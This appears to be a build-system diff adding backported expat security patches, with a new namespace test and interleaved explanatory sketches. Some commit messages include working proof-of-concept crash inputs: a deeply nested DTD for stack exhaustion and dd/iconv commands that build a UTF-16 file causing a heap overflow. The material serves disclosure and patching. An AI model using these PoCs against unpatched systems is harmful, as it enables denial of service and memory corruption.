++START_TEST(test_ns_separator_in_uri) {
++ struct test_case {
++ enum XML_Status expectedStatus;
++ const char *doc;
++ };
++ struct test_case cases[] = {
++ {XML_STATUS_OK, "<doc xmlns='one_two' />"},
++ {XML_STATUS_ERROR, "<doc xmlns='one&#x0A;two' />"},
++ };
++
++ size_t i = 0;
++ size_t failCount = 0;
++ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
++ XML_Parser parser = XML_ParserCreateNS(NULL, '\n');
++ XML_SetElementHandler(parser, dummy_start_element, dummy_end_element);
++ if (XML_Parse(parser, cases[i].doc, (int)strlen(cases[i].doc),
++ /*isFinal*/ XML_TRUE)
++ != cases[i].expectedStatus) {
++ failCount++;
++ }
++ XML_ParserFree(parser);
++ }
++
++ if (failCount) {
++ fail("Namespace separator handling is broken");
++ }
++}
++END_TEST
++
+ /* Control variable; the number of times duff_allocator() will successfully
+ * allocate */
+ #define ALLOC_ALWAYS_SUCCEED (-1)
+@@ -11905,6 +11934,7 @@ make_suite(void) {
+ tcase_add_test(tc_namespace, test_ns_utf16_doctype);
+ tcase_add_test(tc_namespace, test_ns_invalid_doctype);
+ tcase_add_test(tc_namespace, test_ns_double_colon_doctype);
++ tcase_add_test(tc_namespace, test_ns_separator_in_uri);
+
+ suite_add_tcase(s, tc_misc);
+ tcase_add_checked_fixture(tc_misc, NULL, basic_teardown);
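The rationale comment added to addBinding is easier to see with the namespace-aware API in hand: XML_ParserCreateNS reports element names as the namespace URI and local name joined by a caller-chosen separator, so a URI that itself contains that separator would make the joined name ambiguous. A small usage sketch, assuming a default (non-XML_UNICODE) build and an arbitrarily chosen '|' separator; per the patch above, a declaration whose URI contains the separator is rejected with XML_ERROR_SYNTAX:

```
#include <expat.h>
#include <stdio.h>
#include <string.h>

/* With XML_ParserCreateNS, element names arrive as "URI<sep>localname". */
static void XMLCALL
start(void *ud, const XML_Char *name, const XML_Char **atts) {
    (void)ud; (void)atts;
    printf("start element: %s\n", name); /* e.g. "http://example.org/ns|doc" */
}

int main(void) {
    const char doc[] = "<doc xmlns='http://example.org/ns'/>";
    XML_Parser p = XML_ParserCreateNS(NULL, '|');
    XML_SetStartElementHandler(p, start);
    /* A document declaring xmlns='a|b' would fail here, because the
     * URI contains the namespace separator. */
    if (XML_Parse(p, doc, (int)strlen(doc), XML_TRUE) != XML_STATUS_OK)
        fprintf(stderr, "parse error: %s\n",
                XML_ErrorString(XML_GetErrorCode(p)));
    XML_ParserFree(p);
    return 0;
}
```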
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
new file mode 100644
index 0000000000..af255e8cb5
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
@@ -0,0 +1,131 @@
+From b12f34fe32821a69dc12ff9a021daca0856de238 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Sat, 19 Feb 2022 23:59:25 +0000
+Subject: [PATCH] Fix build_model regression.
+
+The iterative approach in build_model failed to fill children arrays
+correctly. A preorder traversal is not required and turned out to be the
+culprit. Use an easier algorithm:
+
+Add nodes from scaffold tree starting at index 0 (root) to the target
+array whenever children are encountered. This ensures that children
+are adjacent to each other. This complies with the recursive version.
+
+Store only the scaffold index in numchildren field to prevent a direct
+processing of these children, which would require a recursive solution.
+This allows the algorithm to iterate through the target array from start
+to end without jumping back and forth, converting on the fly.
+
+Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
+---
+ lib/xmlparse.c | 79 ++++++++++++++++++++++++++------------------
+ 1 file changed, 47 insertions(+), 32 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index c479a258..84885b5a 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7373,39 +7373,58 @@ build_model(XML_Parser parser) {
+ *
+ * The iterative approach works as follows:
+ *
+- * - We use space in the target array for building a temporary stack structure
+- * while that space is still unused.
+- * The stack grows from the array's end downwards and the "actual data"
+- * grows from the start upwards, sequentially.
+- * (Because stack grows downwards, pushing onto the stack is a decrement
+- * while popping off the stack is an increment.)
++ * - We have two writing pointers, both walking up the result array; one does
++ * the work, the other creates "jobs" for its colleague to do, and leads
++ * the way:
+ *
+- * - A stack element appears as a regular XML_Content node on the outside,
+- * but only uses a single field -- numchildren -- to store the source
+- * tree node array index. These are the breadcrumbs leading the way back
+- * during pre-order (node first) depth-first traversal.
++ * - The faster one, pointer jobDest, always leads and writes "what job
++ * to do" by the other, once they reach that place in the
++ * array: leader "jobDest" stores the source node array index (relative
++ * to array dtd->scaffold) in field "numchildren".
+ *
+- * - The reason we know the stack will never grow into (or overlap with)
+- * the area with data of value at the start of the array is because
+- * the overall number of elements to process matches the size of the array,
+- * and the sum of fully processed nodes and yet-to-be processed nodes
+- * on the stack, cannot be more than the total number of nodes.
+- * It is possible for the top of the stack and the about-to-write node
+- * to meet, but that is safe because we get the source index out
+- * before doing any writes on that node.
++ * - The slower one, pointer dest, looks at the value stored in the
++ * "numchildren" field (which actually holds a source node array index
++ * at that time) and puts the real data from dtd->scaffold in.
++ *
++ * - Before the loop starts, jobDest writes source array index 0
++ * (where the root node is located) so that dest will have something to do
++ * when it starts operation.
++ *
++ * - Whenever nodes with children are encountered, jobDest appends
++ * them as new jobs, in order. As a result, tree node siblings are
++ * adjacent in the resulting array, for example:
++ *
++ * [0] root, has two children
++ * [1] first child of 0, has three children
++ * [3] first child of 1, does not have children
++ * [4] second child of 1, does not have children
++ * [5] third child of 1, does not have children
++ * [2] second child of 0, does not have children
++ *
++ * Or (the same data) presented in flat array view:
++ *
++ * [0] root, has two children
++ *
++ * [1] first child of 0, has three children
++ * [2] second child of 0, does not have children
++ *
++ * [3] first child of 1, does not have children
++ * [4] second child of 1, does not have children
++ * [5] third child of 1, does not have children
++ *
++ * - The algorithm repeats until all target array indices have been processed.
+ */
+ XML_Content *dest = ret; /* tree node writing location, moves upwards */
+ XML_Content *const destLimit = &ret[dtd->scaffCount];
+- XML_Content *const stackBottom = &ret[dtd->scaffCount];
+- XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
++ XML_Content *jobDest = ret; /* next free writing location in target array */
+ str = (XML_Char *)&ret[dtd->scaffCount];
+
+- /* Push source tree root node index onto the stack */
+- (--stackTop)->numchildren = 0;
++ /* Add the starting job, the root node (index 0) of the source tree */
++ (jobDest++)->numchildren = 0;
+
+ for (; dest < destLimit; dest++) {
+- /* Pop source tree node index off the stack */
+- const int src_node = (int)(stackTop++)->numchildren;
++ /* Retrieve source tree array index from job storage */
++ const int src_node = (int)dest->numchildren;
+
+ /* Convert item */
+ dest->type = dtd->scaffold[src_node].type;
+@@ -7427,16 +7446,12 @@ build_model(XML_Parser parser) {
+ int cn;
+ dest->name = NULL;
+ dest->numchildren = dtd->scaffold[src_node].childcnt;
+- dest->children = &dest[1];
++ dest->children = jobDest;
+
+- /* Push children to the stack
+- * in a way where the first child ends up at the top of the
+- * (downwards growing) stack, in order to be processed first. */
+- stackTop -= dest->numchildren;
++ /* Append scaffold indices of children to array */
+ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
+- i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
+- (stackTop + i)->numchildren = (unsigned int)cn;
+- }
++ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib)
++ (jobDest++)->numchildren = (unsigned int)cn;
+ }
+ }
+
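The commit message describes the reworked traversal in prose; the core trick is two cursors walking the same output array, one converting nodes and one appending "which source node goes in this slot" jobs ahead of it, parked in the numchildren field. A simplified, self-contained sketch of that idea on a generic tree (all type and field names here are hypothetical, not expat's):

```
/* Hypothetical source tree node, stored in a flat scaffold array. */
typedef struct {
    int value;
    unsigned int childcnt;
    int firstchild;   /* index into the scaffold array, -1 if none */
    int nextsib;      /* index of next sibling, -1 if none */
} scaffold_t;

/* Hypothetical flattened node: children occupy a contiguous slice. */
typedef struct {
    int value;
    unsigned int numchildren;
    unsigned int firstchild;  /* index of first child; meaningful only
                                 when numchildren > 0 */
} flat_t;

/* Flatten 'count' scaffold nodes rooted at index 0 into 'out' (also of
 * size 'count'), without recursion. 'dest' converts one node per step;
 * 'job' runs ahead and records which scaffold index each upcoming slot
 * should be converted from, parked in the numchildren field -- the same
 * trick the patched build_model uses. */
static void flatten(const scaffold_t *scaffold, flat_t *out, unsigned int count) {
    unsigned int job = 0;                 /* next free slot for a job */
    out[job++].numchildren = 0;           /* seed: root lives at scaffold[0] */
    for (unsigned int dest = 0; dest < count; dest++) {
        const unsigned int src = out[dest].numchildren;  /* read job first */
        out[dest].value = scaffold[src].value;
        out[dest].numchildren = scaffold[src].childcnt;
        out[dest].firstchild = job;
        /* Append this node's children as future jobs, so siblings end up
         * adjacent in the output array. */
        for (int cn = scaffold[src].firstchild; cn >= 0;
             cn = scaffold[cn].nextsib)
            out[job++].numchildren = (unsigned int)cn;
    }
}
```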
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313.patch b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
new file mode 100644
index 0000000000..470d66e9dd
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
@@ -0,0 +1,230 @@
+From 9b4ce651b26557f16103c3a366c91934ecd439ab Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:54:29 +0000
+Subject: [PATCH] Prevent stack exhaustion in build_model
+
+It is possible to trigger stack exhaustion in build_model function if
+depth of nested children in DTD element is large enough. This happens
+because build_node is a recursively called function within build_model.
+
+The code has been adjusted to run iteratively. It uses the already
+allocated heap space as temporary stack (growing from top to bottom).
+
+Output is identical to recursive version. No new fields in data
+structures were added, i.e. it keeps full API and ABI compatibility.
+Instead the numchildren variable is used to temporarily keep the
+index of items (uint vs int).
+
+Documentation and readability improvements kindly added by Sebastian.
+
+Proof of Concept:
+
+1. Compile poc binary which parses XML file line by line
+
+```
+cat > poc.c << EOF
+ #include <err.h>
+ #include <expat.h>
+ #include <stdio.h>
+
+ XML_Parser parser;
+
+ static void XMLCALL
+ dummy_element_decl_handler(void *userData, const XML_Char *name,
+ XML_Content *model) {
+ XML_FreeContentModel(parser, model);
+ }
+
+ int main(int argc, char *argv[]) {
+ FILE *fp;
+ char *p = NULL;
+ size_t s = 0;
+ ssize_t l;
+ if (argc != 2)
+ errx(1, "usage: poc poc.xml");
+ if ((parser = XML_ParserCreate(NULL)) == NULL)
+ errx(1, "XML_ParserCreate");
+ XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
+ if ((fp = fopen(argv[1], "r")) == NULL)
+ err(1, "fopen");
+ while ((l = getline(&p, &s, fp)) > 0)
+ if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
+ errx(1, "XML_Parse");
+ XML_ParserFree(parser);
+ free(p);
+ fclose(fp);
+ return 0;
+ }
+EOF
+cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
+```
+
+2. Create XML file with a lot of nested groups in DTD element
+
+```
+cat > poc.xml.zst.b64 << EOF
+KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
+ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
+ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
+EOF
+base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
+```
+
+3. Run Proof of Concept
+
+```
+./poc poc.xml
+```
+
+Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/558/commits/9b4ce651b26557f16103c3a366c91934ecd439ab
+
+CVE: CVE-2022-25313
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 116 +++++++++++++++++++++++++++++--------------
+ 1 file changed, 79 insertions(+), 37 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..594cf12c 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7317,44 +7317,15 @@ nextScaffoldPart(XML_Parser parser) {
+ return next;
+ }
+
+-static void
+-build_node(XML_Parser parser, int src_node, XML_Content *dest,
+- XML_Content **contpos, XML_Char **strpos) {
+- DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+- dest->type = dtd->scaffold[src_node].type;
+- dest->quant = dtd->scaffold[src_node].quant;
+- if (dest->type == XML_CTYPE_NAME) {
+- const XML_Char *src;
+- dest->name = *strpos;
+- src = dtd->scaffold[src_node].name;
+- for (;;) {
+- *(*strpos)++ = *src;
+- if (! *src)
+- break;
+- src++;
+- }
+- dest->numchildren = 0;
+- dest->children = NULL;
+- } else {
+- unsigned int i;
+- int cn;
+- dest->numchildren = dtd->scaffold[src_node].childcnt;
+- dest->children = *contpos;
+- *contpos += dest->numchildren;
+- for (i = 0, cn = dtd->scaffold[src_node].firstchild; i < dest->numchildren;
+- i++, cn = dtd->scaffold[cn].nextsib) {
+- build_node(parser, cn, &(dest->children[i]), contpos, strpos);
+- }
+- dest->name = NULL;
+- }
+-}
+-
+ static XML_Content *
+ build_model(XML_Parser parser) {
++ /* Function build_model transforms the existing parser->m_dtd->scaffold
++ * array of CONTENT_SCAFFOLD tree nodes into a new array of
++ * XML_Content tree nodes followed by a gapless list of zero-terminated
++ * strings. */
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+ XML_Content *ret;
+- XML_Content *cpos;
+- XML_Char *str;
++ XML_Char *str; /* the current string writing location */
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+@@ -7380,10 +7351,81 @@ build_model(XML_Parser parser) {
+ if (! ret)
+ return NULL;
+
+- str = (XML_Char *)(&ret[dtd->scaffCount]);
+- cpos = &ret[1];
++ /* What follows is an iterative implementation (of what was previously done
++ * recursively in a dedicated function called "build_node". The old recursive
++ * build_node could be forced into stack exhaustion from input as small as a
++ * few megabyte, and so that was a security issue. Hence, a function call
++ * stack is avoided now by resolving recursion.)
++ *
++ * The iterative approach works as follows:
++ *
++ * - We use space in the target array for building a temporary stack structure
++ * while that space is still unused.
++ * The stack grows from the array's end downwards and the "actual data"
++ * grows from the start upwards, sequentially.
++ * (Because stack grows downwards, pushing onto the stack is a decrement
++ * while popping off the stack is an increment.)
++ *
++ * - A stack element appears as a regular XML_Content node on the outside,
++ * but only uses a single field -- numchildren -- to store the source
++ * tree node array index. These are the breadcrumbs leading the way back
++ * during pre-order (node first) depth-first traversal.
++ *
++ * - The reason we know the stack will never grow into (or overlap with)
++ * the area with data of value at the start of the array is because
++ * the overall number of elements to process matches the size of the array,
++ * and the sum of fully processed nodes and yet-to-be processed nodes
++ * on the stack, cannot be more than the total number of nodes.
++ * It is possible for the top of the stack and the about-to-write node
++ * to meet, but that is safe because we get the source index out
++ * before doing any writes on that node.
++ */
++ XML_Content *dest = ret; /* tree node writing location, moves upwards */
++ XML_Content *const destLimit = &ret[dtd->scaffCount];
++ XML_Content *const stackBottom = &ret[dtd->scaffCount];
++ XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
++ str = (XML_Char *)&ret[dtd->scaffCount];
++
++ /* Push source tree root node index onto the stack */
++ (--stackTop)->numchildren = 0;
++
++ for (; dest < destLimit; dest++) {
++ /* Pop source tree node index off the stack */
++ const int src_node = (int)(stackTop++)->numchildren;
++
++ /* Convert item */
++ dest->type = dtd->scaffold[src_node].type;
++ dest->quant = dtd->scaffold[src_node].quant;
++ if (dest->type == XML_CTYPE_NAME) {
++ const XML_Char *src;
++ dest->name = str;
++ src = dtd->scaffold[src_node].name;
++ for (;;) {
++ *str++ = *src;
++ if (! *src)
++ break;
++ src++;
++ }
++ dest->numchildren = 0;
++ dest->children = NULL;
++ } else {
++ unsigned int i;
++ int cn;
++ dest->name = NULL;
++ dest->numchildren = dtd->scaffold[src_node].childcnt;
++ dest->children = &dest[1];
++
++ /* Push children to the stack
++ * in a way where the first child ends up at the top of the
++ * (downwards growing) stack, in order to be processed first. */
++ stackTop -= dest->numchildren;
++ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
++ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
++ (stackTop + i)->numchildren = (unsigned int)cn;
++ }
++ }
++ }
+
+- build_node(parser, 0, ret, &cpos, &str);
+ return ret;
+ }
+
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25314.patch b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
new file mode 100644
index 0000000000..2f713ebb54
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
@@ -0,0 +1,32 @@
+From efcb347440ade24b9f1054671e6bd05e60b4cafd Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:56:57 +0000
+Subject: [PATCH] Prevent integer overflow in copyString
+
+The copyString function is only used for encoding string supplied by
+the library user.
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/560/commits/efcb347440ade24b9f1054671e6bd05e60b4cafd
+
+CVE: CVE-2022-25314
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..a39377c2 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7412,7 +7412,7 @@ getElementType(XML_Parser parser, const ENCODING *enc, const char *ptr,
+
+ static XML_Char *
+ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
+- int charsRequired = 0;
++ size_t charsRequired = 0;
+ XML_Char *result;
+
+ /* First determine how long the string is */
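
The one-line type change matters because the length is accumulated character by character before allocation. A hypothetical sketch of the counting idiom the patch moves to — not expat code, purely illustrative:

```
#include <stddef.h>

/* Accumulate lengths in size_t rather than int, so that very long
 * attacker-supplied input cannot wrap into a short or negative size. */
static size_t count_chars(const char *s) {
    size_t n = 0;             /* size_t, as in the patched copyString() */
    while (s[n] != '\0')
        n++;
    return n + 1;             /* include the terminating NUL */
}
```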
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25315.patch b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
new file mode 100644
index 0000000000..a39771d28a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
@@ -0,0 +1,145 @@
+From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:55:46 +0000
+Subject: [PATCH] Prevent integer overflow in storeRawNames
+
+It is possible to use an integer overflow in storeRawNames for out of
+boundary heap writes. Default configuration is affected. If compiled
+with XML_UNICODE then the attack does not work. Compiling with
+-fsanitize=address confirms the following proof of concept.
+
+The problem can be exploited by abusing the m_buffer expansion logic.
+Even though the initial size of m_buffer is a power of two, eventually
+it can end up a little bit lower, thus allowing allocations very close
+to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
+names can be parsed which are almost INT_MAX in size.
+
+Unfortunately (from an attacker point of view) INT_MAX/2 is also a
+limitation in string pools. Having a tag name of INT_MAX/2 characters
+or more is not possible.
+
+Expat can convert between different encodings. UTF-16 documents which
+contain only ASCII representable characters are twice as large as their
+ASCII-encoded counterparts.
+
+The proof of concept works by taking these three considerations into
+account:
+
+1. Move the m_buffer size slightly below a power of two by having a
+ short root node <a>. This allows the m_buffer to grow very close
+ to INT_MAX.
+2. The string pooling forbids tag names longer than or equal to
+ INT_MAX/2, so keep the attack tag name smaller than that.
+3. To be able to still overflow INT_MAX even though the name is
+ limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
+ which only contains ASCII characters. UTF-16 always stores two
+ bytes per character while the tag name is converted to using only
+ one. Our attack node byte count must be a bit higher than
+ 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
+ in sum can overflow INT_MAX.
+
+Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
+without running into INT_MAX boundary check. The string pooling is
+able to store INT_MAX/3 as tag name because the amount is below
+INT_MAX/2 limitation. And creating the sum of both eventually overflows
+in storeRawNames.
+
+Proof of Concept:
+
+1. Compile expat with -fsanitize=address.
+
+2. Create Proof of Concept binary which iterates through input
+ file 16 MB at once for better performance and easier integer
+ calculations:
+
+```
+cat > poc.c << EOF
+ #include <err.h>
+ #include <expat.h>
+ #include <stdlib.h>
+ #include <stdio.h>
+
+ #define CHUNK (16 * 1024 * 1024)
+ int main(int argc, char *argv[]) {
+ XML_Parser parser;
+ FILE *fp;
+ char *buf;
+ int i;
+
+ if (argc != 2)
+ errx(1, "usage: poc file.xml");
+ if ((parser = XML_ParserCreate(NULL)) == NULL)
+ errx(1, "failed to create expat parser");
+ if ((fp = fopen(argv[1], "r")) == NULL) {
+ XML_ParserFree(parser);
+ err(1, "failed to open file");
+ }
+ if ((buf = malloc(CHUNK)) == NULL) {
+ fclose(fp);
+ XML_ParserFree(parser);
+ err(1, "failed to allocate buffer");
+ }
+ i = 0;
+ while (fread(buf, CHUNK, 1, fp) == 1) {
+ printf("iteration %d: XML_Parse returns %d\n", ++i,
+ XML_Parse(parser, buf, CHUNK, XML_FALSE));
+ }
+ free(buf);
+ fclose(fp);
+ XML_ParserFree(parser);
+ return 0;
+ }
+EOF
+gcc -fsanitize=address -lexpat -o poc poc.c
+```
+
+3. Construct specially prepared UTF-16 XML file:
+
+```
+dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
+echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
+echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
+iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
+```
+
+4. Run proof of concept:
+
+```
+./poc poc-utf16.xml
+```
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/559/commits/eb0362808b4f9f1e2345a0cf203b8cc196d776d9
+
+CVE: CVE-2022-25315
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ lib/xmlparse.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..f34d6ab5 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
+ while (tag) {
+ int bufSize;
+ int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
++ size_t rawNameLen;
+ char *rawNameBuf = tag->buf + nameLen;
+ /* Stop if already stored. Since m_tagStack is a stack, we can stop
+ at the first entry that has already been copied; everything
+@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
+ /* For re-use purposes we need to ensure that the
+ size of tag->buf is a multiple of sizeof(XML_Char).
+ */
+- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
++ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
++ /* Detect and prevent integer overflow. */
++ if (rawNameLen > (size_t)INT_MAX - nameLen)
++ return XML_FALSE;
++ bufSize = nameLen + (int)rawNameLen;
+ if (bufSize > tag->bufEnd - tag->buf) {
+ char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
+ if (temp == NULL)
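
The guard in this hunk follows a general pattern: when one addend is already bounded by INT_MAX, compare the other against the remaining headroom before forming the sum. A hedged, stand-alone sketch of that pattern, with illustrative names:

```
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>

/* name_len is a non-negative int (as nameLen is in storeRawNames),
 * raw_len is a size_t; the total must still fit in an int before it is
 * used as a buffer size. */
static bool checked_buf_size(int name_len, size_t raw_len, int *buf_size)
{
    if (raw_len > (size_t)INT_MAX - (size_t)name_len)
        return false;                  /* int addition would overflow */
    *buf_size = name_len + (int)raw_len;
    return true;
}
```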
diff --git a/meta/recipes-core/expat/expat/CVE-2022-40674.patch b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
new file mode 100644
index 0000000000..8b95f5f198
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
@@ -0,0 +1,53 @@
+From 4a32da87e931ba54393d465bb77c40b5c33d343b Mon Sep 17 00:00:00 2001
+From: Rhodri James <rhodri@wildebeest.org.uk>
+Date: Wed, 17 Aug 2022 18:26:18 +0100
+Subject: [PATCH] Ensure raw tagnames are safe exiting internalEntityParser
+
+It is possible to concoct a situation in which parsing is
+suspended while substituting in an internal entity, so that
+XML_ResumeParser directly uses internalEntityProcessor as
+its processor. If the subsequent parse includes some unclosed
+tags, this will return without calling storeRawNames to ensure
+that the raw versions of the tag names are stored in memory other
+than the parse buffer itself. If the parse buffer is then changed
+or reallocated (for example if processing a file line by line),
+badness will ensue.
+
+This patch ensures storeRawNames is always called when needed
+after calling doContent. The earlier call to doContent does
+not need the same protection; it only deals with entity
+substitution, which cannot leave unbalanced tags, and in any
+case the raw names will be pointing into the stored entity
+value not the parse buffer.
+
+Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/4a32da87e931ba54393d465bb77c40b5c33d343b]
+CVE: CVE-2022-40674
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+ expat/lib/xmlparse.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+Index: expat/lib/xmlparse.c
+===================================================================
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5657,10 +5657,15 @@ internalEntityProcessor(XML_Parser parse
+ {
+ parser->m_processor = contentProcessor;
+ /* see externalEntityContentProcessor vs contentProcessor */
+- return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
+- s, end, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer,
+- XML_ACCOUNT_DIRECT);
++ result = doContent(parser, parser->m_parentParser ? 1 : 0,
++ parser->m_encoding, s, end, nextPtr,
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++ XML_ACCOUNT_DIRECT);
++ if (result == XML_ERROR_NONE) {
++ if (! storeRawNames(parser))
++ return XML_ERROR_NO_MEMORY;
++ }
++ return result;
+ }
+ }
+
diff --git a/meta/recipes-core/expat/expat/CVE-2022-43680.patch b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
new file mode 100644
index 0000000000..6f93bc3ed7
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
@@ -0,0 +1,33 @@
+From 5290462a7ea1278a8d5c0d5b2860d4e244f997e4 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 20 Sep 2022 02:44:34 +0200
+Subject: [PATCH] lib: Fix overeager DTD destruction in
+ XML_ExternalEntityParserCreate
+
+CVE: CVE-2022-43680
+Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/5290462a7ea1278a8d5c0d5b2860d4e244f997e4.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comments: Hunk refreshed
+---
+ lib/xmlparse.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index aacd6e7fc..57bf103cc 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -1035,6 +1035,14 @@ parserCreate(const XML_Char *encodingNam
+ parserInit(parser, encodingName);
+
+ if (encodingName && ! parser->m_protocolEncodingName) {
++ if (dtd) {
++ // We need to stop the upcoming call to XML_ParserFree from happily
++ // destroying parser->m_dtd because the DTD is shared with the parent
++ // parser and the only guard that keeps XML_ParserFree from destroying
++ // parser->m_dtd is parser->m_isParamEntity but it will be set to
++ // XML_TRUE only later in XML_ExternalEntityParserCreate (or not at all).
++ parser->m_dtd = NULL;
++ }
+ XML_ParserFree(parser);
+ return NULL;
+ }
diff --git a/meta/recipes-core/expat/expat/libtool-tag.patch b/meta/recipes-core/expat/expat/libtool-tag.patch
index 0a0aed23e5..c59ccbbede 100644
--- a/meta/recipes-core/expat/expat/libtool-tag.patch
+++ b/meta/recipes-core/expat/expat/libtool-tag.patch
@@ -1,30 +1,27 @@
-From 10342e6b600858b091bc7771e454d9e06af06410 Mon Sep 17 00:00:00 2001
-From: Khem Raj <raj.khem@gmail.com>
-Date: Thu, 2 Nov 2017 18:20:57 +0800
+From da433dbe79f2d4d5d7d79869c669594c99c5de9c Mon Sep 17 00:00:00 2001
+From: Jasper Orschulko <jasper@fancydomain.eu>
+Date: Wed, 16 Jun 2021 19:00:30 +0200
Subject: [PATCH] Add CC tag to build
-Add CC tag to build
-
Upstream-Status: Pending
-Signed-off-by: Khem Raj <raj.khem@gmail.com>
-Signed-off-by: Dengke Du <dengke.du@windriver.com>
+Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
---
- Makefile.in | 2 +-
+ Makefile.am | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
-diff --git a/Makefile.in b/Makefile.in
-index 9560a95..d444bd6 100644
---- a/Makefile.in
-+++ b/Makefile.in
-@@ -319,7 +319,7 @@ LIBCURRENT = @LIBCURRENT@
- LIBOBJS = @LIBOBJS@
- LIBREVISION = @LIBREVISION@
- LIBS = @LIBS@
--LIBTOOL = @LIBTOOL@
-+LIBTOOL = @LIBTOOL@ --tag CC
- LIPO = @LIPO@
- LN_S = @LN_S@
- LTLIBOBJS = @LTLIBOBJS@
